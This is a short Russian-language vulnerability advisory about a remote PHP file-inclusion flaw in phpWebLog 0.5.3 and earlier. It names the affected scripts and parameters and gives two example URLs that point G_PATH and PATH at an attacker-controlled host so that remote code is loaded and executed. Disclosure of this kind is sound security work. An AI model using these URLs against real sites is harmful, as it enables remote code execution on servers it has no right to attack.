PHP-инклюдинг в phpWebLog

Дата публикации:
09.03.2005
Всего просмотров:
1086
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpWebLog 0.5.3 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценариях 'include/init.inc.php' и 'backend/addons/links/index.php' из-за некорректной обработки входных данных в переменных 'G_PATH' и 'PATH'. Удаленный пользователь может помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/[dir]/include/init.inc.php?G_PATH=http://[attacker]/

http://[target]/[dir]/backend/addons/links/inde x.php?PATH=http://[attacker]/

URL производителя: http://phpweblog.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpWebLog Include File Flaw Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA